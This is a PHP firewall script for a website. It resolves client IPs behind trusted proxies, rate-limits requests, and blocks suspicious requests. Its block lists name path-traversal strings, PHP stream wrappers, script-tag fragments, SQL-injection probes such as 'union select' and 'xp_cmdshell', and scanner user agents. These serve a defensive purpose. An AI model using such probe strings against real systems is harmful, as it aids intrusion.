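<?php
declare(strict_types=1);

/**
 * Mangaberri firewall.php (DROP-IN)
 *
 * - Blocks common exploit/probe patterns (RFI/LFI, traversal, php wrappers, xss/sql probes)
 * - Allows signed image proxy endpoints (cover.php / img.php / i.php)
 * - Allows normal SEO routes and query strings
 * - Optional allow Cloudflare real IP (optionally restricted to trusted proxy addresses)
 * - Optional IP deny/allow
 *
 * This is a heuristic request filter and a defence-in-depth layer only: it does not
 * replace parameterised queries, output escaping, or web-server level access rules.
 *
 * Usage:
 *   require __DIR__ . '/firewall.php';
 *   require __DIR__ . '/bootstrap.php';
 */

/* ========================= Config ========================= */

// If you are behind Cloudflare or reverse proxy, set true
$TRUST_CLOUDFLARE = true;

// Addresses (IP or CIDR, v4 or v6) of the proxies that are allowed to set
// CF-Connecting-IP / X-Forwarded-For. When this list is non-empty, forwarded
// headers are honoured only when REMOTE_ADDR is one of these proxies; a client
// that reaches the origin directly cannot then forge its address.
// Leave empty to keep the legacy behaviour (headers trusted from any peer).
$TRUSTED_PROXY_CIDRS = [
    // '10.0.0.0/8',
];

// Allowlist critical endpoints (signed image tokens / binary output)
$ALLOW_PATH_PREFIX = [
    '/cover.php',
    '/img.php',
    '/i.php',
    '/favicon.ico',
    '/robots.txt',
    '/sitemap.xml',
];

// If you have an API endpoint path, allow it (adjust!)
$ALLOW_API_PREFIX = [
    '/api/',     // if you use /api/*
    '/actions',  // if you use /actions for ajax
];

// Deny these file extensions from direct access (if they appear in URL path)
$DENY_EXT = [
    '.env',
    '.ini',
    '.log',
    '.sql',
    '.bak',
    '.old',
    '.swp',
    '.git',
    '.svn',
];

// Rate limit (very lightweight, temp-file based)
$RATE_LIMIT_ON   = true;
$RATE_WINDOW_SEC = 30;   // window
$RATE_MAX_REQ    = 220;  // per IP per window
$RATE_EXCLUDE_PREFIX = [
    '/cover.php',
    '/img.php',
    '/i.php', // don’t rate-limit image proxy (you may if you want)
];

// Optional IP deny list (exact matches). Applied to every path, including the
// allowlisted endpoints above.
$IP_DENY = [
    // '1.2.3.4',
];

// Optional: allow only these IPs for /admin (leave empty to disable)
$ADMIN_IP_ALLOW = [
    // '111.222.333.444',
];

// HTTP methods that are rejected everywhere, including allowlisted endpoints.
$BAD_METHODS = ['TRACE', 'TRACK'];

/* ========================= Helpers ========================= */

/**
 * Test whether $ip lies inside $cidr ("a.b.c.d/n", "x::/n", or a bare address).
 *
 * Mixed address families, malformed input and out-of-range prefix lengths all
 * return false, so a bad entry in the trusted-proxy list never widens trust.
 */
function fw_ip_in_cidr(string $ip, string $cidr): bool
{
    $cidr = trim($cidr);
    if ($cidr === '') {
        return false;
    }

    $slash = strpos($cidr, '/');
    $network = $slash === false ? $cidr : substr($cidr, 0, $slash);

    $ipBin  = @inet_pton($ip);
    $netBin = @inet_pton($network);
    if ($ipBin === false || $netBin === false || strlen($ipBin) !== strlen($netBin)) {
        return false;
    }

    $maxBits = strlen($ipBin) * 8;
    if ($slash === false) {
        $bits = $maxBits;
    } else {
        $bitsStr = substr($cidr, $slash + 1);
        if ($bitsStr === '' || !ctype_digit($bitsStr)) {
            return false;
        }
        $bits = (int)$bitsStr;
        if ($bits > $maxBits) {
            return false;
        }
    }

    // Compare whole bytes first, then the partial byte (if any) under a mask.
    $fullBytes = intdiv($bits, 8);
    if ($fullBytes > 0 && substr($ipBin, 0, $fullBytes) !== substr($netBin, 0, $fullBytes)) {
        return false;
    }
    $remBits = $bits % 8;
    if ($remBits === 0) {
        return true;
    }
    $mask = (0xFF << (8 - $remBits)) & 0xFF;
    return ((ord($ipBin[$fullBytes]) ^ ord($netBin[$fullBytes])) & $mask) === 0;
}

/**
 * True when $ip matches at least one entry of $cidrs (see fw_ip_in_cidr).
 */
function fw_ip_in_any_cidr(string $ip, array $cidrs): bool
{
    foreach ($cidrs as $cidr) {
        if (is_string($cidr) && fw_ip_in_cidr($ip, $cidr)) {
            return true;
        }
    }
    return false;
}

/**
 * Resolve the client address used for deny lists, admin allow and rate limiting.
 *
 * @param bool  $trustCloudflare    When false, REMOTE_ADDR is returned unchanged.
 * @param array $trustedProxyCidrs  Proxies allowed to set forwarded headers. When
 *                                  non-empty, headers are honoured only if the TCP
 *                                  peer is in this list, and X-Forwarded-For is read
 *                                  from the right (proxy-appended) end. When empty,
 *                                  legacy behaviour: any peer's headers are trusted
 *                                  and the leftmost X-Forwarded-For entry is used.
 * @return string A validated IP address, or REMOTE_ADDR ('0.0.0.0' if unset).
 */
function fw_client_ip(bool $trustCloudflare, array $trustedProxyCidrs = []): string
{
    $remote = (string)($_SERVER['REMOTE_ADDR'] ?? '0.0.0.0');
    if (!$trustCloudflare) {
        return $remote;
    }

    // Forwarded headers are client-supplied unless the peer is a known proxy.
    $restricted = $trustedProxyCidrs !== [];
    if ($restricted && !fw_ip_in_any_cidr($remote, $trustedProxyCidrs)) {
        return $remote;
    }

    // Cloudflare header (most reliable when the peer really is Cloudflare)
    $cf = trim((string)($_SERVER['HTTP_CF_CONNECTING_IP'] ?? ''));
    if ($cf !== '' && filter_var($cf, FILTER_VALIDATE_IP)) {
        return $cf;
    }

    // Fallback: X-Forwarded-For
    $xff = (string)($_SERVER['HTTP_X_FORWARDED_FOR'] ?? '');
    if ($xff !== '') {
        $hops = array_map('trim', explode(',', $xff));
        if ($restricted) {
            // Walk from the end: proxies append, so the first hop that is not a
            // trusted proxy is the real client. Stop at the first unparsable hop.
            for ($i = count($hops) - 1; $i >= 0; $i--) {
                $hop = $hops[$i];
                if (!filter_var($hop, FILTER_VALIDATE_IP)) {
                    break;
                }
                if (!fw_ip_in_any_cidr($hop, $trustedProxyCidrs)) {
                    return $hop;
                }
            }
        } elseif (filter_var($hops[0], FILTER_VALIDATE_IP)) {
            // Legacy: leftmost entry (spoofable when the origin is reachable directly).
            return $hops[0];
        }
    }

    return $remote;
}

/**
 * True when $s starts with any non-empty entry of $prefixes (byte-wise, case-sensitive).
 */
function fw_starts_with_any(string $s, array $prefixes): bool
{
    foreach ($prefixes as $prefix) {
        if ($prefix !== '' && strncmp($s, $prefix, strlen($prefix)) === 0) {
            return true;
        }
    }
    return false;
}

/**
 * Send a minimal plain-text refusal with the given status code and stop the script.
 */
function fw_block(int $code = 403): void
{
    http_response_code($code);
    header('Content-Type: text/plain; charset=utf-8');
    echo "Blocked";
    exit;
}

/**
 * Count one request for $ip in a fixed window and report whether the limit is exceeded.
 *
 * State lives in a per-IP JSON file under the system temp dir. The read-modify-write
 * is done under an exclusive flock on a single handle so concurrent requests do not
 * lose updates. Any I/O failure returns false (best effort: never block on a broken
 * temp dir), matching the original's suppressed-error behaviour.
 *
 * @return bool True when the counter for the current window exceeds $maxReq.
 */
function fw_rate_limit_exceeded(string $ip, int $windowSec, int $maxReq): bool
{
    $now  = time();
    // md5 keeps the file name fixed-length and free of path characters; it is a
    // cache key, not a security control.
    $file = sys_get_temp_dir() . '/mb_fw_' . md5($ip . '|' . $windowSec);

    $fh = @fopen($file, 'c+');
    if ($fh === false) {
        return false;
    }
    try {
        if (!flock($fh, LOCK_EX)) {
            return false;
        }
        $json = stream_get_contents($fh);
        $data = (is_string($json) && $json !== '') ? json_decode($json, true) : null;
        if (!is_array($data)) {
            $data = ['t' => $now, 'c' => 0];
        }
        $t = (int)($data['t'] ?? $now);
        $c = (int)($data['c'] ?? 0);

        if (($now - $t) > $windowSec) {
            // Window expired: start a new one with this request.
            $t = $now;
            $c = 1;
        } else {
            $c++;
        }

        rewind($fh);
        ftruncate($fh, 0);
        fwrite($fh, json_encode(['t' => $t, 'c' => $c]));
        fflush($fh);
        flock($fh, LOCK_UN);

        return $c > $maxReq;
    } finally {
        fclose($fh);
    }
}

/* ========================= Read request context ========================= */

$uri    = (string)($_SERVER['REQUEST_URI'] ?? '/');
$path   = parse_url($uri, PHP_URL_PATH);
$path   = is_string($path) ? $path : '/';
// Percent-decoded path: the web server decodes before mapping a file, so deny-type
// checks must look at the decoded form or an encoded letter sidesteps them.
$pathDecoded = rawurldecode($path);
$query  = (string)($_SERVER['QUERY_STRING'] ?? '');
$method = strtoupper((string)($_SERVER['REQUEST_METHOD'] ?? 'GET'));
$ua     = (string)($_SERVER['HTTP_USER_AGENT'] ?? '');
$ip     = fw_client_ip($TRUST_CLOUDFLARE, $TRUSTED_PROXY_CIDRS);

/* ========================= Deny IPs ========================= */
// Checked before the allowlist so a denied address is refused on every path.
if (in_array($ip, $IP_DENY, true)) {
    fw_block(403);
}

/* ========================= Hard allowlist paths ========================= */
// Signed image / API endpoints skip the heuristic checks below (their tokens and
// payloads could otherwise trip a pattern). Matching is on the raw path, so an
// encoded path simply does not qualify and falls through to the full checks.
if (fw_starts_with_any($path, $ALLOW_PATH_PREFIX) || fw_starts_with_any($path, $ALLOW_API_PREFIX)) {
    // Still block some extreme method abuse even on allowlisted endpoints
    if (in_array($method, $BAD_METHODS, true)) {
        fw_block(405);
    }
    return;
}

/* ========================= Admin IP allow (optional) ========================= */
if ($ADMIN_IP_ALLOW !== [] && strncmp($pathDecoded, '/admin', 6) === 0) {
    if (!in_array($ip, $ADMIN_IP_ALLOW, true)) {
        fw_block(403);
    }
}

/* ========================= Bad methods ========================= */
if (in_array($method, $BAD_METHODS, true)) {
    fw_block(405);
}

/* ========================= Block access to sensitive files by extension ========================= */
$lowerPaths = [strtolower($path), strtolower($pathDecoded)];
foreach ($DENY_EXT as $ext) {
    if ($ext === '') {
        continue;
    }
    foreach ($lowerPaths as $candidate) {
        if (str_ends_with($candidate, $ext)) {
            fw_block(403);
        }
    }
}

/* ========================= Path traversal / wrapper / injection probes ========================= */
$raw = strtolower(urldecode($uri));
$BAD_URI = [
    '../', '..\\', '%2e%2e', '%252e',
    'php://', 'file://', 'data://', 'expect://', 'input://', 'zip://', 'phar://',
    '<script', '</script', '%3cscript', '%3c%2fscript',
    'onerror=', 'onload=',
];
foreach ($BAD_URI as $bad) {
    if (strpos($raw, $bad) !== false) {
        fw_block(403);
    }
}

/* ========================= Query string SQL probe patterns (conservative) ========================= */
$q = strtolower(urldecode($query));
$BAD_Q = [
    'union select', 'information_schema', 'sleep(', 'benchmark(',
    'load_file(', 'into outfile', 'xp_cmdshell',
];
foreach ($BAD_Q as $bad) {
    if ($bad !== '' && strpos($q, $bad) !== false) {
        fw_block(403);
    }
}

/* ========================= Overlong URI protection ========================= */
if (strlen($uri) > 6000 || strlen($query) > 5000) {
    fw_block(414);
}

/* ========================= Bad bot UAs (light) ========================= */
$uaL = strtolower($ua);
$BAD_UA = ['sqlmap', 'nikto', 'acunetix', 'masscan', 'nmap', 'zgrab', 'nessus', 'dirbuster'];
foreach ($BAD_UA as $b) {
    if ($b !== '' && strpos($uaL, $b) !== false) {
        fw_block(403);
    }
}

/* ========================= Optional rate limiting ========================= */
if ($RATE_LIMIT_ON
    && !fw_starts_with_any($path, $RATE_EXCLUDE_PREFIX)
    && fw_rate_limit_exceeded($ip, $RATE_WINDOW_SEC, $RATE_MAX_REQ)) {
    fw_block(429);
}

/* ========================= PASS ========================= */
return;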